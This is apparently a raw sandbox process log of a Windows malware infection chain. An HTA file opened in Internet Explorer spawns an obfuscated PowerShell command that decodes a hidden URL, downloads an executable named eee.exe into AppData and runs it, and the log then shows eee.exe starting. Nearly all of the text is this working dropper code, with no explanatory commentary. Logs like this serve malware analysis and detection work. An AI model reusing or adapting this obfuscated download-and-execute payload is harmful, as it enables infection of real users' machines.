iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\bazila.hta.html
2612powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zJf($Qam, $lyA){[IO.File]::WriteAllBytes($Qam, $lyA)};function TPk($Qam){if($Qam.EndsWith((ANO @(4660,4714,4722,4722))) -eq $True){rundll32.exe $Qam }elseif($Qam.EndsWith((ANO @(4660,4726,4729,4663))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Qam}elseif($Qam.EndsWith((ANO @(4660,4723,4729,4719))) -eq $True){misexec /qn /i $Qam}else{Start-Process $Qam}};function Zbf($iVo){$MvJ = New-Object (ANO @(4692,4715,4730,4660,4701,4715,4712,4681,4722,4719,4715,4724,4730));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lyA = $MvJ.DownloadData($iVo);return $lyA};function ANO($DIw){$DYi=4614;$lSF=$Null;foreach($Mze in $DIw){$lSF+=[char]($Mze-$DYi)};return $lSF};function bID(){$kPn = $env:AppData + '\';;;$mUBIuDwhhjWEPp = $kPn + 'eee.exe'; if (Test-Path -Path $mUBIuDwhhjWEPp){TPk $mUBIuDwhhjWEPp;}Else{ $HgTkSNV = Zbf (ANO @(4718,4730,4730,4726,4729,4672,4661,4661,4736,4735,4726,4668,4712,4715,4665,4733,4735,4713,4662,4663,4660,4725,4724,4715,4659,4713,4722,4719,4713,4721,4728,4660,4719,4713,4731,4661,4715,4715,4715,4660,4715,4734,4715));zJf $mUBIuDwhhjWEPp $HgTkSNV;TPk $mUBIuDwhhjWEPp;};;}bID;
2924eee.exe "C:\Users\test22\AppData\Roaming\eee.exe"
2884